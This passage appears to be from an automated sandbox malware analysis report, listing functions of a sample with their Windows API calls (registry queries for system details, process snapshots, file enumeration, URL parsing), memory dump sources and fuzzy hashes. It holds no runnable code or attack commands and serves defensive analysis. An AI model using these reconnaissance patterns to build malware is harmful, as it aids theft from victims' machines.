                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                                            • API String ID: 3660427363-1022791448
                                                                                                                                                                                                                                                                                            • Opcode ID: b9f1d27b948a2cde859decee709fabe3fc3aaf7079ba9210fc7bef9a2106faad
                                                                                                                                                                                                                                                                                            • Instruction ID: 32cc7c2ada2b86104a3a49f668f9a4e07e20b2ad3b816f2a31f760a166775264
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9f1d27b948a2cde859decee709fabe3fc3aaf7079ba9210fc7bef9a2106faad
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F0A7BE6010006FC1049789EC85C5B73AAEBD52157184039F90DC6321D6A5AD15CB28
                                                                                                                                                                                                                                                                                            Function 0041FF59 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?), ref: 0041FF9F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                                            • String ID: DisplayName
                                                                                                                                                                                                                                                                                            • API String ID: 3660427363-3786665039
                                                                                                                                                                                                                                                                                            • Opcode ID: bc31a2ff1834048140c9dfee421bfaf7d1603ec0065aed378ec0e313bf8dafab
                                                                                                                                                                                                                                                                                            • Instruction ID: f5713496be0a026c6677b26d3adc6da17140d2fb9fb8e09341883e6bed890c7d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc31a2ff1834048140c9dfee421bfaf7d1603ec0065aed378ec0e313bf8dafab
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF09A75700101AFE3148B49DC81F2A73E8ABCA314F08442DF946D7391E6B8ED098BAA
                                                                                                                                                                                                                                                                                            Function 0041F1F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0041F22B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                                            • String ID: ProductName
                                                                                                                                                                                                                                                                                            • API String ID: 3660427363-3586724618
                                                                                                                                                                                                                                                                                            • Opcode ID: 297f8375b1038bb0d3d7efae8f7a8fb007ca2ae3d08dc7cd9e0f1bc1478d321a
                                                                                                                                                                                                                                                                                            • Instruction ID: d06dab5c00e1cd9b568c1344ba8a1129501a229b943713cdd63673397a6e7b0d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 297f8375b1038bb0d3d7efae8f7a8fb007ca2ae3d08dc7cd9e0f1bc1478d321a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AF0ECB66400045FC608DB49EC52D7AB79DEBA5214B04003AF908C7321E5A17C158725
                                                                                                                                                                                                                                                                                            Function 0041F955 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,ProcessorNameString,?,?,?,?), ref: 0041F98C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                                            • String ID: ProcessorNameString
                                                                                                                                                                                                                                                                                            • API String ID: 3660427363-2160769855
                                                                                                                                                                                                                                                                                            • Opcode ID: 31041bb49acb937d4b380fc0fc361d606422b0c06ebdfe4616e1dac201ad4636
                                                                                                                                                                                                                                                                                            • Instruction ID: 552663aaeae6f16054e1a020f72e43f719887551d2972acdf4c5440fe477a02d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31041bb49acb937d4b380fc0fc361d606422b0c06ebdfe4616e1dac201ad4636
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39E09B7B750104AFC108D74DFC41C67B39DEBD9115B04053AF949C3311D5657D19C664
                                                                                                                                                                                                                                                                                            Function 0041F1A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119), ref: 0041F1DC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                                            • API String ID: 71445658-2278330950
                                                                                                                                                                                                                                                                                            • Opcode ID: 476f3307aa02160a5b5e6049588745abe0e09f88a314fee225192767593139a3
                                                                                                                                                                                                                                                                                            • Instruction ID: f7d6863b10dd3ef7c86b8c37ee4a6ed4c782ebdb65dcfa4361654b1c1eeb25b1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 476f3307aa02160a5b5e6049588745abe0e09f88a314fee225192767593139a3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FE04FB9B402156BD318DF1AFC52F227258FB52204F190028BD05D7263D69168248958
                                                                                                                                                                                                                                                                                            Function 004234CE Relevance: 3.0, APIs: 2, Instructions: 27processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004234F0
                                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000), ref: 004234FD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2353314856-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d0aafe996ae6847ea86accd4ca33bdfc7634bf740571bcb37ff440368e241406
                                                                                                                                                                                                                                                                                            • Instruction ID: 227a4079254baf746a4b3145b4eccbe3d1c1d191b7d66606b6d4c0c46632bee1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0aafe996ae6847ea86accd4ca33bdfc7634bf740571bcb37ff440368e241406
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7E0DF74301205AFE7A0CB1DEC92F6632E8FBC6348F140038B508CB3C1DA20EC208769
                                                                                                                                                                                                                                                                                            Function 00428E2D Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DriveTypememset
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1397174798-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b57d072800557abae0a5aa22fb6253ca5f3f77b3917338c5565a3f969117a767
                                                                                                                                                                                                                                                                                            • Instruction ID: 05f602f88df0723ab444c59d209778b1bca8aad3002b6ddd03543a7d9dd94d56
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b57d072800557abae0a5aa22fb6253ca5f3f77b3917338c5565a3f969117a767
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86E0867DF402105BD700CB40DD85F9DB375BBE9301F244136E50497345D6B4A9114B44
                                                                                                                                                                                                                                                                                            Function 00410B38 Relevance: 1.6, APIs: 1, Instructions: 112fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00410C8F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e44fe60c8639863d2c315c246c48f04d5d8cfac3e492799677a20636737e1b07
                                                                                                                                                                                                                                                                                            • Instruction ID: 774cd959641f09b608a44bffdc7760c736467633c15014411cd55cc47401f3d7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e44fe60c8639863d2c315c246c48f04d5d8cfac3e492799677a20636737e1b07
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7641487A6001648FC704DFACEDD1A9973B5EF89604F040068EA06D3265EA34FF64CF8A
                                                                                                                                                                                                                                                                                            Function 00404468 Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004044FF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CrackInternet
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1381609488-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8ca45ac23f5f80d14643078be58b4809d258a7f24a3690ed9c8315075ae20a95
                                                                                                                                                                                                                                                                                            • Instruction ID: 9197950a34bd4c976d15aab42ed2e9430d39523bc9f36c003b53b492bb8b4f1e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ca45ac23f5f80d14643078be58b4809d258a7f24a3690ed9c8315075ae20a95
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D1130B56101049FDB44EF6DEC82A6F77E8EB8A258B04403DE809C7311D738EE159B69
                                                                                                                                                                                                                                                                                            Function 004131B8 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00413298
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3a29d8ca63820d5722b582f667db8b337fae8528adca656499e5a846500da76d
                                                                                                                                                                                                                                                                                            • Instruction ID: 46ee3b8e51b98a700c03f76e3129104915c10ea7453c9402c637743a23bd37a1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a29d8ca63820d5722b582f667db8b337fae8528adca656499e5a846500da76d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD2131B6A007099FC745CF68DC81BD9B3B1FF99304F048629D959D7211EB30BA68CB95
                                                                                                                                                                                                                                                                                            Function 00428AD8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00428B8D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cd3aa1e78e9bafe1509456a5680c28c2fd7ad0762637759b60c567d48fb9704d
                                                                                                                                                                                                                                                                                            • Instruction ID: f05d9e3c906a89cc39a28d3f1c3c1cdf9eccc8e36dd42beb386d9ba1c5efffb7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd3aa1e78e9bafe1509456a5680c28c2fd7ad0762637759b60c567d48fb9704d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B21D675E007598FEB51CF68D880AAABBF0BB48200F01856AD959E7311E734AA85CF94
                                                                                                                                                                                                                                                                                            Function 004281A3 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002B95A,?,00000000,00000000), ref: 004281F4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9f766c61395a17931d0f1b18f2dfe0ebdacd91c9f8f739b9e91bdfc8bef2e541
                                                                                                                                                                                                                                                                                            • Instruction ID: 333401f703d56baabf777b19cb238a4d8652f21cbd007379918289329deaa6e8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f766c61395a17931d0f1b18f2dfe0ebdacd91c9f8f739b9e91bdfc8bef2e541
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD11A1B6340244AFD314DB5CECD1E6AB3E9EFC4209B190539E55AC3361DA34BE18CB28
                                                                                                                                                                                                                                                                                            Function 0040F621 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0040F6B3
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a7703d518600a256b01e6be35bebfad8b62186e0db01ff4d5707e6f2c8d3ec17
                                                                                                                                                                                                                                                                                            • Instruction ID: f292f0bd4e0c0730813694860e680219b469247554fa056f98eb1f0cfd166385
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7703d518600a256b01e6be35bebfad8b62186e0db01ff4d5707e6f2c8d3ec17
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D011737A7402048BCB00DF9CDDC1BD973B6BF89314F044668A919DB356DA74EA68CB89
                                                                                                                                                                                                                                                                                            Function 0041FC37 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041FC8B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
